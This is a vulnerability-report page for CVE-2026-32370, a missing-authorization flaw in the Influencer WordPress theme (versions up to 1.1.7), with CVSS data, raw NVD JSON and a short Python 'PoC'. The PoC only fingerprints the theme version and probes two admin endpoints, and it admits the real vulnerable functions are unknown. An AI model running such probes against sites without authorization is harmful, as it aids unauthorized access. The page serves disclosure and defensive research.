Security Vulnerability Report
中文
CVE-2026-32370 CVSS 5.3 MEDIUM

CVE-2026-32370

Published: 2026-03-13 19:54:51
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Influencer influencer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Influencer: from n/a through <= 1.1.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Influencer主题 <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32370 PoC - Missing Authorization in Influencer theme # Target: WordPress site with Influencer theme <= 1.1.7 target_url = "http://target-wordpress-site.com" # Check if the site uses the vulnerable Influencer theme check_url = f"{target_url}/wp-content/themes/influencer/style.css" response = requests.get(check_url) if "Influencer" in response.text and "Version: 1.1.7" in response.text: print("[+] Target is potentially vulnerable") # Try to access theme options without authentication # This is a generic PoC - actual endpoints may vary vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-admin/themes.php?page=influencer_options", ] # Example: Attempt to modify theme settings # Note: Actual exploitation requires identifying specific vulnerable functions for endpoint in vulnerable_endpoints: try: test_response = requests.get(endpoint, timeout=10) if test_response.status_code == 200: print(f"[*] Endpoint accessible: {endpoint}") except requests.RequestException: pass print("[*] PoC completed. Manual verification required.") print("[*] Recommendation: Upgrade to latest version of Influencer theme")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32370", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:51.350", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Influencer influencer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Influencer: from n/a through <= 1.1.7."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en raratheme Influencer influencer permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Influencer: desde n/a hasta &lt;= 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/influencer/vulnerability/wordpress-influencer-theme-1-1-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}